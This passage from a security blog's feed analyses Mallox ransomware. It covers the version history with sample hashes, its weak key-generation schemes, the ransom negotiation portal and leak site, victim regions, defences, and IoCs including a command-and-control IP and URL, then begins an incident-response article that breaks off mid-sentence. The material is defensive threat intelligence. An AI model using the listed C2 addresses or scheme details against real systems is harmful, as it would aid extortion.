sizes="(max-width: 957px) 100vw, 957px" /></a><p id="caption-attachment-113642" class="wp-caption-text">Server response</p></div><h3 id="timeline-of-mallox-versions">Timeline of Mallox versions</h3><p>We have been tracking a large number of samples since the very first version of Mallox appeared in 2021. During this time, more than 700 different samples have been found, which we have divided into 12 versions for convenience. This division is based on changes in ransomware functionality or cryptography. Please note that the Trojan samples do not contain any version numbers internally. In the tables below, we provide a brief description of changes introduced in each Mallox version along with the MD5 of one of the samples belonging to this version.</p><table width="738"><tbody><tr><td width="252"><strong>Sample hash (MD5)</strong></td><td width="54"><strong>Version</strong></td><td width="84"><strong>PE timestamp</strong></td><td width="348"><strong>Comment</strong></td></tr><tr><td width="252">9b772efb921de8f172f21125dd0e0ff7</td><td width="54">1</td><td width="84">15 May 2021</td><td width="348">Earliest found version</td></tr><tr><td width="252">79b60f8b5052a9d4cc0c92c2cdc47485</td><td width="54">2</td><td width="84">20 Nov 2021</td><td width="348">The notes became generic, presumably as an initial step in a transition to RaaS distribution.</td></tr><tr><td width="252">e713f05a62914496eef512a93a611622</td><td width="54">3</td><td width="84">17 Feb 2022</td><td width="348">Fixed a vulnerability in the encryption scheme that allowed files to be decrypted without the attackers’ private keys.</td></tr><tr><td width="252">3829a09bca120206883539eb33d55311</td><td width="54">4</td><td width="84">9 May 2022</td><td width="348">Disabled self-spreading. The vulnerability is still fixed.</td></tr><tr><td width="252">a8e214683307adaff39783dc656b398a</td><td width="54">5 (gen)</td><td width="84">10 Jun 2022</td><td width="348">Removed the vulnerability fix introduced in version 3. Added a new public key generation scheme using data from the device — we refer to this scheme as “generated key”. Added a new “-path” argument. Enabled self-spreading again.</td></tr><tr><td width="252">ac1a255e5c908f12ef68a45fc0043b16</td><td width="54">6 (emb)</td><td width="84">17 Jul 2022</td><td width="348">Removed the vulnerability fix introduced in version 3. Added a new public key generation scheme, using an embedded key — we refer to this scheme as “embedded key”.</td></tr></tbody></table><p>Starting with versions 5 and 6, all the subsequent versions through 11 were divided into two key generation schemes: “generated key” (gen) and “embedded key” (emb). These versions were used in parallel, and if some changes were made to one of these variants, then the other variant with the same changes would soon appear, sometimes on the same day. Later in this report, we will describe both methods in detail.</p><table width="738"><tbody><tr><td width="252"><strong>Hash (MD5)</strong></td><td width="60"><strong>Version</strong></td><td width="84"><strong>PE timestamp</strong></td><td width="342"><strong>Comment</strong></td></tr><tr><td width="252">b1b42fa300d8f43c6deb98754caf0934</td><td width="60">7 (gen)</td><td width="84">25 Oct 2022</td><td width="342">Added registry modification functions and an OS shutdown message.</p><p>Completed the transition to a RaaS distribution scheme with support for affiliate IDs hardcoded in the Trojan’s body and reported to C&C via the HTTP parameter “user=”.</td></tr><tr><td width="252">3762f98a55f0ec19702f388fc0db74e2</td><td width="60">8 (emb)</td><td width="84">31 Oct 2022</td><td width="342">Similar to the previous one, but with a different key generation scheme.</td></tr><tr><td width="252">6bd93817967cdb61e0d7951382390fa0</td><td width="60">9 (gen)</td><td width="84">18 Apr 2023</td><td width="342">Added a new argument: “-queue”.</td></tr><tr><td width="252">c494342b6c84f649dece4df2d3ff1031</td><td width="60">10 (emb)</td><td width="84">18 Apr 2023</td><td width="342">Similar to the previous one, but with a different key generation scheme.</td></tr><tr><td width="252">16e708876c32ff56593ba00931e0fb67</td><td width="60">11 (emb)</td><td width="84">25 Sep 2023</td><td width="342">Switched to an x64 version: later versions are also x64, while all earlier versions were x86. Added new features: power scheme, disabling UAC, hiding Shutdown/Reboot/Sign out buttons, etc. Switched to a new format for arguments: requires valid file paths as arguments. Also, instead of ChaCha, file content is now encrypted with AES-256-GCM.</td></tr><tr><td width="252">d32a3478aad766be96f0cdbda1f10091</td><td width="60">11 (gen)</td><td width="84">26 Sep 2023</td><td width="342">Similar to the previous one, but with a different key generation scheme.</td></tr><tr><td width="252">e98b3a8d2179e0bd0bebba42735d11b7</td><td width="60">12</td><td width="84">6 Mar 2024</td><td width="342">Fixed a vulnerability in the key generation schemes by adopting a new, cryptographically secure scheme. Added the cryptographic random number generator CTR_DRBG (AES based).</td></tr></tbody></table><p>There is one version that stands out from this classification. We dubbed it 1F. The only two samples belonging to this version were discovered in June 2023 and February 2024. Despite the discovery dates, they are almost exactly the same as the first version, but with a fixed vulnerability in the cryptographic scheme. What is curious, this fix differs from the convoluted encryption schemes seen in versions 3, 4 and 12. Instead, it is a small local fix using the cryptographically secure SystemFunction036 (RtlGenRandom) function for seed generation.</p><p><strong> </strong></p><table width="714"><tbody><tr><td width="252"><strong>Hash (MD5)</strong></td><td width="66"><strong>Version</strong></td><td width="90"><strong>PE timestamp</strong></td><td width="306"><strong>Comment</strong></td></tr><tr><td width="252">98c7f6b6ddf6a01adb25457e9a3c52b8</td><td width="66">1F</td><td width="90">5 Jun 2023</td><td width="306">Fixed a vulnerability in the version 1 key generation scheme using RtlGenRandom.</td></tr><tr><td width="252">b13a1e9c7ef5a51f64a58bae9b508e62</td><td width="66">1F</td><td width="90">23 Feb 2024</td><td width="306">Exactly the same as the previous one.</td></tr></tbody></table><h4 id="cryptographic-scheme-in-v5-and-above-the-generated-key-variant">Cryptographic scheme in v5 and above: the “generated key” variant</h4><p>This scheme uses data from the device to populate an array with a maximum size of 56 bytes, from which a user ECC private key is obtained. The array is generated based on the functions GetVolumeInformationW, GetFileTime, GetComputerNameA, and the CPUID instruction.</p><table width="691"><tbody><tr><td width="146"><strong>Bytes count</strong></td><td width="326"><strong>Entropy source</strong></td><td width="219"><strong>Comment</strong></td></tr><tr><td width="146">4</td><td width="326">GetVolumeInformationW</td><td width="219"> </td></tr><tr><td width="146">16</td><td width="326">__cpuid</td><td width="219"> </td></tr><tr><td width="146">12</td><td width="326">Embedded in code</td><td width="219">Varies between samples</td></tr><tr><td width="146">8</td><td width="326">GetFileTime</td><td width="219"> </td></tr><tr><td width="146"><= 16</td><td width="326">GetComputerNameA</td><td width="219">Can be less than 16 bytes</td></tr></tbody></table><p>The rest of the scheme contains three curve25519 calls, similar to the recent version (12), but unlike that, the scheme described in this paragraph is not cryptographically secure.</p><div id="attachment_113641" style="width: 649px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125837/Mallox-ransomware-17.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113641" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125837/Mallox-ransomware-17.png" alt="Shared key generation, generated key" width="639" height="486" class="size-full wp-image-113641" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125837/Mallox-ransomware-17.png 639w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125837/Mallox-ransomware-17-300x228.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125837/Mallox-ransomware-17-460x350.png 460w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125837/Mallox-ransomware-17-368x280.png 368w" sizes="(max-width: 639px) 100vw, 639px" /></a><p id="caption-attachment-113641" class="wp-caption-text">Shared key generation, “generated key”, v5+</p></div><h4 id="cryptographic-scheme-in-v6-and-above-the-embedded-key-variant">Cryptographic scheme in v6 and above: the “embedded key” variant</h4><p>In this case, no random value generation is used to calculate the shared secret share_key. The user_private_key is hardcoded in the Trojan’s body, and the rest of the scheme has not changed compared to the first version. This is also a cryptographically non-secure scheme.</p><div id="attachment_113640" style="width: 782px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113640" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18.png" alt="Shared key generation, embedded key" width="772" height="392" class="size-full wp-image-113640" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18.png 772w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18-300x152.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18-768x390.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18-689x350.png 689w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18-740x376.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125822/Mallox-ransomware-18-551x280.png 551w" sizes="(max-width: 772px) 100vw, 772px" /></a><p id="caption-attachment-113640" class="wp-caption-text">Shared key generation, “embedded key”, v5+</p></div><h2 id="negotiation-portal-and-dls-data-leak-site">Negotiation portal and DLS (data leak site)</h2><p>When encrypting a victim’s files Mallox creates a ransom note commonly named “HOW TO BACK FILES.txt”, “HOW TO RESTORE FILES.txt”, “RECOVERY INFORMATION.txt”, “FILE RECOVERY.txt” or some such. In the note, the threat actors instruct the victim about the ways to communicate with the attackers to negotiate the ransom payment: by visiting a specified TOR site (negotiation portal) and logging in with the victim ID, or by sending an email message to a specified address.</p><p>Upon authenticating with the negotiation portal, the victim is presented with a page containing information about their infection case:</p><ul><li>Status: whether the exfiltrated data has been published</li><li>Ransom price in USD and BTC</li><li>Payment addresses for BTC and TETHER TRC-20</li><li>Answers to frequently asked questions</li><li>Chat widget to talk to the ransomware operator</li></ul><div id="attachment_113637" style="width: 1569px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113637" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19.png" alt="Negotiation portal (victim page)" width="1559" height="982" class="size-full wp-image-113637" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19.png 1559w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-300x189.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-1024x645.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-768x484.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-1536x968.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-556x350.png 556w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-740x466.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-445x280.png 445w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125732/Mallox-ransomware-19-800x504.png 800w" sizes="(max-width: 1559px) 100vw, 1559px" /></a><p id="caption-attachment-113637" class="wp-caption-text">Negotiation portal (victim page)</p></div><p>The main page of the Mallox data leak site, which resides on the same domain as the negotiation portal, contains the list of victim companies. Countdown timers indicate the remaining time until the stolen data from each company is published in case the victim fails to pay up.</p><div id="attachment_113636" style="width: 1505px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113636" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20.png" alt="Mallox data leak site: the home page" width="1495" height="1616" class="size-full wp-image-113636" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20.png 1495w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-278x300.png 278w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-947x1024.png 947w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-768x830.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-1421x1536.png 1421w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-324x350.png 324w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-740x800.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-259x280.png 259w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125711/Mallox-ransomware-20-800x865.png 800w" sizes="(max-width: 1495px) 100vw, 1495px" /></a><p id="caption-attachment-113636" class="wp-caption-text">Mallox data leak site: the home page</p></div><p>The information about the companies that apparently refused to cooperate is provided on a new page when the user clicks “View”. This page lists some details, such as the victim’s approximate revenue, the total volume of stolen data, links to download archives allegedly containing some or all of the exfiltrated files, and the password to unpack the archives.</p><div id="attachment_113635" style="width: 1505px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113635" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21.png" alt="Page with victim company details" width="1495" height="1609" class="size-full wp-image-113635" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21.png 1495w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-279x300.png 279w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-951x1024.png 951w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-768x827.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-1427x1536.png 1427w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-325x350.png 325w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-740x796.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-260x280.png 260w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125648/Mallox-ransomware-21-800x861.png 800w" sizes="(max-width: 1495px) 100vw, 1495px" /></a><p id="caption-attachment-113635" class="wp-caption-text">Page with victim company details</p></div><p>For additional publicity and promotion of their affiliate program, the Mallox threat actors maintain an X account that posts regular updates about the group’s new victims and shares links to download new portions of stolen data.</p><div id="attachment_113639" style="width: 1067px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113639" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22.png" alt="Mallox profile on X" width="1057" height="1322" class="size-full wp-image-113639" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22.png 1057w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-240x300.png 240w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-819x1024.png 819w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-768x961.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-280x350.png 280w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-740x926.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-224x280.png 224w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125805/Mallox-ransomware-22-720x900.png 720w" sizes="(max-width: 1057px) 100vw, 1057px" /></a><p id="caption-attachment-113639" class="wp-caption-text">Mallox profile on X</p></div><h2 id="victims">Victims</h2><p>The geographical distribution of unique KSN users who encountered the Mallox ransomware shows that the affiliates of the RaaS do not restrict their activities to a specific country and apparently aim to attack vulnerable companies anywhere these are located. That being said, some regions tend to be a more desirable target for Mallox extortionists. The countries that have attracted the most infection attempts are Brazil, Vietnam and China.</p><div class="js-infogram-embed" data-id="_/Ww7OiYhrRlz3yFdQcB4e" data-type="interactive" data-title="03 EN Mallox data" style="min-height:;"></div><p align="center"><strong>Geographical chart of Mallox attack attempts (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30125551/03-en-mallox-data.png" target="_blank" rel="noopener">download</a>)</strong></p><h2 id="conclusions">Conclusions</h2><p>Our report provides a comprehensive overview of the Mallox ransomware, its characteristics, the history of its evolution, and the potential impact it can have on victims. By understanding the nature of Mallox ransomware and implementing appropriate security measures, companies and organizations can better safeguard their digital assets and minimize the risk of falling victim to this malicious software.</p><p>Our recommendations for maximizing your organization’s security:</p><ul><li>Do not expose remote desktop services, such as RDP, to public networks unless absolutely necessary, and always use strong passwords.</li><li>Make sure commercial VPN solutions and other server-side software are always up to date as exploitation of this type of software is a common ransomware infection vector. Always keep client-side applications up to date.</li><li>Focus your defense strategy on detecting lateral movements and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections. Back up data regularly. Make sure you can quickly access it in an emergency. Use the latest <a href="https://www.kaspersky.com/enterprise-security/threat-intelligence?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______bfda9ada279bba81">Threat Intelligence</a> information to stay up to date on the latest TTPs used by threat actors.</li><li>Use <a href="https://www.kaspersky.com/enterprise-security/managed-detection-and-response?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kmdr____9b047f5d537c64bd">Managed Detection and Response</a> services to help identify and stop an attack in the early stages, before the attackers achieve their ultimate goals.</li><li>To protect the corporate environment, educate your employees. Dedicated training courses can help, such as those provided in the <a href="https://www.kaspersky.com/small-to-medium-business-security/security-awareness-platform?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___kasap____ef6f1f2ddb03f1d2">Kaspersky Automated Security Awareness Platform</a>.</li><li>Use complex security solutions, combining endpoint protection and automated incident response features, such as <a href="https://www.kaspersky.com/next?icid=gl_KNext_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext____501d6fad574f7808">Kaspersky NEXT</a>.</li></ul><h2 id="ioc">IoC</h2><p><strong>MD5</strong></p><p><a href="https://opentip.kaspersky.com/9b772efb921de8f172f21125dd0e0ff7?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______64ba9bc9a43b6adf&utm_source=SL&utm_medium=SL&utm_campaign=SL">9b772efb921de8f172f21125dd0e0ff7</a></p><p><a href="https://opentip.kaspersky.com/79b60f8b5052a9d4cc0c92c2cdc47485?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d9793931ea84b2e0&utm_source=SL&utm_medium=SL&utm_campaign=SL">79b60f8b5052a9d4cc0c92c2cdc47485</a></p><p><a href="https://opentip.kaspersky.com/e713f05a62914496eef512a93a611622?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6a6ebd1165dda3d0&utm_source=SL&utm_medium=SL&utm_campaign=SL">e713f05a62914496eef512a93a611622</a></p><p><a href="https://opentip.kaspersky.com/3829a09bca120206883539eb33d55311?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______250fef02e649f8f3&utm_source=SL&utm_medium=SL&utm_campaign=SL">3829a09bca120206883539eb33d55311</a></p><p><a href="https://opentip.kaspersky.com/a8e214683307adaff39783dc656b398a?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6038e7db7f195538&utm_source=SL&utm_medium=SL&utm_campaign=SL">a8e214683307adaff39783dc656b398a</a></p><p><a href="https://opentip.kaspersky.com/ac1a255e5c908f12ef68a45fc0043b16?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______848a7e7ce4d7c544&utm_source=SL&utm_medium=SL&utm_campaign=SL">ac1a255e5c908f12ef68a45fc0043b16</a></p><p><a href="https://opentip.kaspersky.com/b1b42fa300d8f43c6deb98754caf0934?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______e0285013b2421312&utm_source=SL&utm_medium=SL&utm_campaign=SL">b1b42fa300d8f43c6deb98754caf0934</a></p><p><a href="https://opentip.kaspersky.com/3762f98a55f0ec19702f388fc0db74e2?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0154f5d9ee706fd7&utm_source=SL&utm_medium=SL&utm_campaign=SL">3762f98a55f0ec19702f388fc0db74e2</a></p><p><a href="https://opentip.kaspersky.com/6bd93817967cdb61e0d7951382390fa0?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______cb514f6d6270a7b7&utm_source=SL&utm_medium=SL&utm_campaign=SL">6bd93817967cdb61e0d7951382390fa0</a></p><p><a href="https://opentip.kaspersky.com/c494342b6c84f649dece4df2d3ff1031?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9cbf884c0c1575c3&utm_source=SL&utm_medium=SL&utm_campaign=SL">c494342b6c84f649dece4df2d3ff1031</a></p><p><a href="https://opentip.kaspersky.com/16e708876c32ff56593ba00931e0fb67?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a7c3ec9e88468ce9&utm_source=SL&utm_medium=SL&utm_campaign=SL">16e708876c32ff56593ba00931e0fb67</a></p><p><a href="https://opentip.kaspersky.com/d32a3478aad766be96f0cdbda1f10091?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______dd5f47c868d52d84&utm_source=SL&utm_medium=SL&utm_campaign=SL">d32a3478aad766be96f0cdbda1f10091</a></p><p><a href="https://opentip.kaspersky.com/e98b3a8d2179e0bd0bebba42735d11b7?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______890a30122b27dd70&utm_source=SL&utm_medium=SL&utm_campaign=SL">e98b3a8d2179e0bd0bebba42735d11b7</a></p><p><a href="https://opentip.kaspersky.com/98c7f6b6ddf6a01adb25457e9a3c52b8?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______568369655128fc49&utm_source=SL&utm_medium=SL&utm_campaign=SL">98c7f6b6ddf6a01adb25457e9a3c52b8</a></p><p><a href="https://opentip.kaspersky.com/b13a1e9c7ef5a51f64a58bae9b508e62?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9f5af632ac222fa8&utm_source=SL&utm_medium=SL&utm_campaign=SL">b13a1e9c7ef5a51f64a58bae9b508e62</a></p><p><strong>URLs</strong></p><p><a href="https://opentip.kaspersky.com/91.215.85.142%2FQWEwqdsvsf%2Fap.php?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7c314d10ef8e241d&utm_source=SL&utm_medium=SL&utm_campaign=SL">91.215.85.142%2FQWEwqdsvsf%2Fap.php</a></p><p><a href="https://opentip.kaspersky.com/whyers.io%2FQWEwqdsvsf%2Fap.php?icid=gl_OpenTIP_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______7b3d9f02527e383f&utm_source=SL&utm_medium=SL&utm_campaign=SL">whyers.io%2FQWEwqdsvsf%2Fap.php</a></p>]]></content:encoded> <wfw:commentRss>https://securelist.com/mallox-ransomware/113529/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30121417/SL-Mallox-elliptic-curve-featured.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30121417/SL-Mallox-elliptic-curve-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30121417/SL-Mallox-elliptic-curve-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30121417/SL-Mallox-elliptic-curve-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>A deep dive into the most interesting incident response cases of last year</title> <link>https://securelist.com/incident-response-interesting-cases-2023/113611/</link> <comments>https://securelist.com/incident-response-interesting-cases-2023/113611/#respond</comments> <dc:creator><![CDATA[Eduardo Ovalle, Ahmad Zaidi Said, AbdulRhman Alfaifi]]></dc:creator> <pubDate>Tue, 03 Sep 2024 11:00:24 +0000</pubDate> <category><![CDATA[SOC, TI and IR posts]]></category> <category><![CDATA[2FA]]></category> <category><![CDATA[Backdoor]]></category> <category><![CDATA[Flax Typhoon]]></category> <category><![CDATA[Incident response]]></category> <category><![CDATA[Insider threat]]></category> <category><![CDATA[Phishing]]></category> <category><![CDATA[Spear phishing]]></category> <category><![CDATA[Targeted attacks]]></category> <category><![CDATA[ToddyCat]]></category> <category><![CDATA[Vulnerabilities and exploits]]></category><category><![CDATA[APT (Targeted attacks)]]></category> <category><![CDATA[Internal threats]]></category> <category><![CDATA[Windows malware]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113611</guid> <description><![CDATA[Kaspersky Global Emergency Response Team (GERT) shares the most interesting IR cases for the year 2023: insider attacks, ToddyCat-like APT, Flax Typhoon and more.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03092959/gert-interesting-cases-featured-1-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>In 2023, Kaspersky’s Global Emergency Response Team (GERT) participated in services around the world that allowed our experts to gain insight into various threats and techniques used by APT groups, common crimeware and, in some cases, internal adversaries. As we highlighted in our <a href="https://securelist.com/kaspersky-incident-response-report-2023/112504/" target="_blank" rel="noopener">annual report</a>, the most prominent threat in 2023 was ransomware, and the Government vertical was the sector that most frequently requested digital forensics, incident response and malware analysis (DFIRMA) services. While file encryption was the most common threat last year, this post proposes a deep dive into specific cases that caught our attention and were mentioned during our annual <a href="https://securelist.com/webinars/analyzing-last-years-cyber-incident-cases/" target="_blank" rel="noopener">DFIRMA report webinar</a>.</p><h2 id="the-insider-fraud-attack">The insider fraud attack</h2><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113659" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-1024x576.png" alt="" width="1024" height="576" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-1024x576.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-300x169.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-768x432.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-1536x864.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-800x450.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-622x350.png 622w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-740x416.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01-498x280.png 498w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30160826/incident_response_interesting_cases_2023_01.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p><p>A group of collaborators at a government organization identified an internal service that allowed the creation of legitimate transactions that weren’t direct money transfers, but could result in monetary losses for the organization. These losses could reach millions of dollars.</p><p>The following scenario (not related to a specific customer) could be considered an example of such misuse of an internal service:</p><blockquote><p><em>A bank only allows a customer to open a maximum of two bank accounts for free, with the customer paying a fee to open additional accounts. However, the adversary used the internal system to create multiple bank accounts for individual customers, who avoided paying the required fees in exchange for a payment to the adversary. As a result of this incident, the organization reported a loss of more than $20 million.</em></p></blockquote><p>Many logs related to the application in question, as well as VPN access and network activity, were requested for analysis and the employees involved in the fraudulent activity were identified. Two different cases were analyzed in which the abuse of transaction configuration was confirmed, one by exploiting a vulnerability in a debugging interface and the other by misusing privileges in a valid account.</p><p>In the first case, GERT identified a misconfiguration that was abused by the adversaries to steal cookies from other users to impersonate them and their activity. An application on one of the analyzed systems registered exception logging details that included cookies for the user that encountered the exception, allowing us to determine the user 